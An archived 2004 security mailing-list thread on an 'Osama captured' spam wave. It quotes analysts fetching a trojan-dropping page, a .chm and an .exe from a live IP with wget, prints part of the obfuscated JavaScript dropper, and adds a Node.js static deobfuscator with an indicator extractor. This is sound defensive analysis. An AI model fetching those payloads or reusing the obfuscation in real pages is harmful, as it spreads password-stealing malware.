Security Incidents mailing list archives
Re: Massive increase in spam volume?
From: "Don Wilder" <don () thewilders org>
Date: Mon, 26 Apr 2004 10:33:22 -0400
This is actually an exploit and was discussed last week on the Dshield email list. I am copying the findings here for your information.
-Don

---------- cut from Dshield ------------------

From: "Blanchard, Joe" <BLANCHAJ () bsci com>
Sender: <list-bounces () lists dshield org>
Subject: RE: [Dshield] Osama email
Date: Fri, 23 Apr 2004 14:05:26 -0400
To: "'General DShield Discussion List'" <list () lists dshield org>

Not sure this is the same as noted on this article.

I'm seeing the following when hitting that link:
html off of pics attempts to DL pics.chm, which in turn (I believe) DLs and runs pics.exe. Oddly, while I've not enough time to fully investigate this, it overwrites my wmplayer.exe resulting in a change in size to 11k from 72k. Variant maybe?

Cheers
-Joe

Follows is wgets of the item(s)

[root@ jgb]# wget http://220.95.231.54/pics
--13:59:16--  http://220.95.231.54/pics
           => `pics'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 302 Object Moved
Location: http://220.95.231.54/pics/ [following]
--13:59:17--  http://220.95.231.54/pics/
           => `index.html'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,113 [text/html]

100%[====================================>] 4,113         17.54K/s    ETA 00:00

13:59:17 (17.54 KB/s) - `index.html' saved [4113/4113]

[root@ jgb]# more index.html
<script>
<!--
function S(){var s=location.href.substr(7);return s.substr(0,s.indexOf('/'));}
function T(){return 'l';}
function U(){return 'C';}
function V(){return 'm';}
function W(){return '.';}
function X(){return 'E';}
function Y(){return 'i';}
function Z(){return 'x';}
document.write(unescape("%3"+U()+"HTML%3"+X()+"%3"+U()+"H"+X()+"AD%3"+X()+
"%3"+U()+"TITL"+X()+"%3"+X()+"where%20to%20buy%20v"+Y()+"agra%3"+U()+"/TITL"+X()+
"%3"+
==========intentional left out full source

[root@jgb]# wget http://220.95.231.54/pics.chm
--14:00:56--  http://220.95.231.54/pics.chm
           => `pics.chm'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11,268 [application/octet-stream]

100%[====================================>] 11,268        23.72K/s    ETA 00:00

14:00:57 (23.72 KB/s) - `pics.chm' saved [11268/11268]

[root@jgb]# wget http://220.95.231.54/pics.exe
--14:03:11--  http://220.95.231.54/pics.exe
           => `pics.exe'
Connecting to 220.95.231.54:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10,752 [application/octet-stream]

100%[====================================>] 10,752        21.65K/s    ETA 00:00

14:03:12 (21.65 KB/s) - `pics.exe' saved [10752/10752]

----------
From: list-bounces () lists dshield org [SMTP:list-bounces () lists dshield org] on behalf of Deb Hale [SMTP:haled () pionet net]
Sent: Friday, April 23, 2004 12:40 PM
To: 'General DShield Discussion List'
Subject: [Dshield] Osama email

FYI, I just received notification from my AV that the file that Bjorn Stromberg emailed had the Exploit-MhtRedir.gen virus. It appears that is what they are calling this particular email. Symantec calls it Backdoor.Nibu.D and says that it attempts to steal passwords and bank account information.

http://securityresponse.symantec.com/avcenter/venc/data/backdoor.nibu.d.html

Deb
_______________________________________________
list mailing list
list () lists dshield org
To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list

----------------------------------------------

On Sun, 25 Apr 2004 23:00:05 -0700 (PDT) "Jay D. Dyson" <jdyson () treachery net> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> On Sat, 24 Apr 2004, Thamer Al-Harbash wrote:
>
> > I work at a large ISP in Canada and just a few hours ago we've experienced a massive increase in spam volume. The volume is so high it's bordering on being a denial of service attack.
> >
> > Does anyone know if there's a worm out in the wild currently doing this? I've confirmed with some of my colleagues that other ISPs are also experiencing this.
> >
> > I'm interested in finding specific netblocks but the spam seems to be coming from everywhere.
>
> I'd say you're seeing the first wave of what appears to be a new worm. Earlier this evening I received about 20 copies of the same message (same subject, same body, different senders) which was titled, "Osama bin Laden found!" and listed a URL (http://220.95.231.54/pics/).
>
> Being naturally curious (and even more naturally paranoid), I went to the URL...but not with my browser. What I snagged was an obfuscated Javascript page which -- from what I could decipher at a glance -- was some kind of spam pitch for cheap prescription drugs. I didn't bother looking for a malicious payload after that.
>
> So what we have here could be a worm that spews spam. This sort of thing will pretty much render the idea of blackholing netblocks useless now, since unpatched Windows systems are everywhere.
>
> That's my take. I look forward to hearing about what others have seen land in their inboxes.
>
> - -Jay
>
>    (    (                                                          _______
>    ))   ))   .--"There's always time for a good cup of coffee."--.   >====<--.
>   C|~~|C|~~| )>------ Jay D. Dyson - jdyson () treachery net ------<(  |  =  |-'
>    `--' `--' `-If you wanna make God laugh, tell him your plans.-'  `------'
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.2.4 (TreacherOS)
> Comment: See http://www.treachery.net/~jdyson/ for current keys.
>
> iD8DBQFAjKVp6uxsHJ5aYG4RAsRGAJ484Fe0Rp1i+d/yt3yAnDPPRoSvwACcC8I0
> aSmguv2f7zEF4hky8xDx6D4=
> =ZZ/E
> -----END PGP SIGNATURE-----

---------------------------------------------------------------------------
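The index.html that Joe pulled with wget builds its page from helper functions that each return a single character, glued together with string literals and fed through unescape(): "%3"+U() is just "%3C", i.e. "<". Both Joe and Jay note they could only decipher it at a glance, which is exactly the situation where a static decoder helps. The Node.js script below is an added example, not code from any message in this thread or from the site in question. SAMPLE is constructed after the pattern in the captured index.html (it is not the page that was served from 220.95.231.54); the decoder never executes the sample, it only collects the constant helpers, folds the concatenation, and applies the legacy %XX / %uXXXX unescape, then lists the .chm/.exe file names an analyst would hunt for.

```javascript
// Added example, not code from any message in this thread: a static
// deobfuscator for the "each helper returns one character" pattern seen in
// the index.html that was fetched with wget above. SAMPLE is constructed
// after that pattern; it is not the page that was served from 220.95.231.54.
const SAMPLE = `
<script>
<!--
function S(){var s=location.href.substr(7);return s.substr(0,s.indexOf('/'));}
function T(){return 'l';}
function U(){return 'C';}
function V(){return 'm';}
function W(){return '.';}
function X(){return 'E';}
function Y(){return 'i';}
function Z(){return 'x';}
document.write(unescape("%3"+U()+"HTML%3"+X()+"%3"+U()+"H"+X()+"AD%3"+X()+
"%3"+U()+"TITL"+X()+"%3"+X()+"where%20to%20buy%20v"+Y()+"agra%3"+U()+"/TITL"+X()+"%3"+X()+
"%3"+U()+"/H"+X()+"AD%3"+X()+"%3"+U()+"A%20HR"+X()+"F=%22p"+Y()+"cs"+W()+"ch"+V()+"%22%3"+X()));
//-->
</script>
`;

// Step 1: collect helpers of the form  function N(){return 'c';}
// Helpers with real logic (like S() above, which reads location.href) are
// deliberately not collected, so they surface as an error instead of being guessed.
function collectHelpers(src) {
  const helpers = {};
  const re = /function\s+(\w+)\s*\(\)\s*\{\s*return\s*'((?:[^'\\]|\\.)*)'\s*;?\s*\}/g;
  let m;
  while ((m = re.exec(src)) !== null) helpers[m[1]] = m[2];
  return helpers;
}

// Step 2: cut out the argument of document.write(unescape( ... )) by
// tracking parentheses and string literals, without executing anything.
function extractWriteArg(src) {
  const marker = 'document.write(unescape(';
  const start = src.indexOf(marker);
  if (start < 0) return null;
  let depth = 1, inStr = null, out = '';
  for (let i = start + marker.length; i < src.length; i++) {
    const ch = src[i];
    if (inStr) { out += ch; if (ch === inStr) inStr = null; continue; }
    if (ch === '"' || ch === "'") { inStr = ch; out += ch; continue; }
    if (ch === '(') depth++;
    if (ch === ')' && --depth === 0) return out;
    out += ch;
  }
  return null; // unbalanced: the capture was truncated
}

// Step 3: fold the concatenation "lit"+N()+"lit" into one string. Only string
// literals, known constant helpers, '+' and whitespace are accepted.
function evalConcat(expr, helpers) {
  const tokenRe = /"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'|(\w+)\s*\(\)|\+|\s+/g;
  let out = '', pos = 0, m;
  while ((m = tokenRe.exec(expr)) !== null) {
    if (m.index !== pos) throw new Error('unexpected token at offset ' + pos);
    pos = tokenRe.lastIndex;
    if (m[1] !== undefined) out += m[1];
    else if (m[2] !== undefined) out += m[2];
    else if (m[3] !== undefined) {
      if (!(m[3] in helpers)) throw new Error('non-constant helper ' + m[3] + '()');
      out += helpers[m[3]];
    }
  }
  if (pos !== expr.length) throw new Error('unparsed tail at offset ' + pos);
  return out;
}

// Step 4: the legacy unescape(): %XX and %uXXXX sequences.
function jsUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, b) => String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

function deobfuscate(src) {
  const arg = extractWriteArg(src);
  if (arg === null) throw new Error('no complete document.write(unescape(...)) found');
  return jsUnescape(evalConcat(arg, collectHelpers(src)));
}

// Defender's view: once the HTML is readable, pull out the file names an
// analyst would block or hunt for (.chm/.exe, as in the pics.chm -> pics.exe chain above).
function findIndicators(html) {
  return html.match(/[\w-]+\.(?:chm|exe)\b/gi) || [];
}

const decoded = deobfuscate(SAMPLE);
console.log(decoded);
console.log('indicators:', findIndicators(decoded));
```

The decoder is deliberately strict: a helper with real logic, such as the S() that reads location.href, or an expression made of anything other than literals and constant helpers, stops it with an error rather than letting it guess. Run against the constructed sample it prints the rebuilt HTML head and an indicator list containing pics.chm; against a capture like Joe's truncated one, where the closing parentheses are missing, extractWriteArg() returns null and the script says so instead of producing a misleading partial result.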
Current thread:
- Massive increase in spam volume? Thamer Al-Harbash (Apr 25)
- Re: Massive increase in spam volume? Ken Budd (Apr 25)
- Re: Massive increase in spam volume? Vinod Kumar (Apr 26)
- RE: Massive increase in spam volume? Bojan Zdrnja (Apr 26)
- Re: Massive increase in spam volume? TML (Apr 26)
- Re: Massive increase in spam volume? Josh Tolley (Apr 26)
- RE: Massive increase in spam volume? James C Slora Jr (Apr 26)
- Re: Massive increase in spam volume? Jay D. Dyson (Apr 26)
- Re: Massive increase in spam volume? Niek (Apr 26)
- Re: Massive increase in spam volume? 'Osama Captured' e-Mail is Malicious Trojan webdevi (Apr 26)
- Re: Massive increase in spam volume? Don Wilder (Apr 26)
- Re: Massive increase in spam volume? David M. Dinner (Apr 27)
- <Possible follow-ups>
- RE: Massive increase in spam volume? Tom . Marchand (Apr 26)
- RE: Massive increase in spam volume? Garneau . Marie-Josee (Apr 26)
- FW: Massive increase in spam volume? Andy Streule (Apr 27)
- RE: Massive increase in spam volume? Steven Trewick (Apr 27)
- RE: Massive increase in spam volume? Thamer Al-Harbash (Apr 30)